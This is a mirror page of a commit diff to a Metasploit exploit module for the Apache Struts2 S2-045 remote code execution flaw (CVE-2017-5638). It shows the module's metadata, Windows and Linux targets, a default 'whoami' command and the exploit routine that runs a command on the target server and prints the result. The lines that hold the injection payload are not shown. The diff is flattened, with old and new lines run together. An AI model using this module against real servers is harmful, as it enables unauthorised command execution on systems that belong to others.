infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Struts2 S2-045 Exploit 2017/03/08

bug/bundler_fix
root 2017-03-08 14:26:33 +08:00
parent b73a884c05
commit c5fb69bd89
1 changed files with 67 additions and 80 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
modules/exploits/multi/http/struts2_s2045_rce.rb
View File

@ -1,32 +1,24 @@
require 'msf/core' require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Apache Struts2 S2-045 Remote Code Execution Exploit(CVE-2017-5638)', 'Name' => 'Apache Struts2 S2-045 Remote Code Execution Exploit(CVE-2017-5638)',
'Description' => %q{ 'Description' => %q{It is possible to perform a RCE attack with a malicious Content-Type value.If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.Discoverd by Nike.Zheng.
It is possible to perform a RCE attack with a malicious Content-Type value.If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.Discoverd By Nike.Zheng.
}, },
'Author' => [ 'MSF Module: Chorder(http://chorder.net)'], 'Author' => [ 'Exploit: Nike.Zheng','MSF Module: Chorder(http://chorder.net)'],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' => [ [ 'CVE', '2017-5638'] ],
[
[ 'CVE', '2017-5638']
],
'Privileged' => true, 'Privileged' => true,
'Platform' => %w{ linux win }, 'Platform' => %w{ linux win },
'Arch' => 'x86', 'Arch' => 'x86',
'DefaultOptions' =>{ 'DefaultOptions' =>{
'CMD' => 'whoami' 'CMD' => 'whoami'
}, },
'Targets' => 'Targets' =>[
[
['Windows Universal', ['Windows Universal',
{ {
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
@ -43,7 +35,6 @@ class MetasploitModule < Msf::Exploit::Remote
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 06 2017')) 'DisclosureDate' => 'Mar 06 2017'))
register_options( register_options(
[ [
Opt::RPORT(8080), Opt::RPORT(8080),
@ -74,8 +65,6 @@ class MetasploitModule < Msf::Exploit::Remote
print_status( resp.body ) print_status( resp.body )
end end
def exploit def exploit
unless datastore['CMD'].blank? unless datastore['CMD'].blank?
print_status("Executing Command...") print_status("Executing Command...")
@ -83,7 +72,5 @@ class MetasploitModule < Msf::Exploit::Remote
return return
end end
handler handler
end end
end end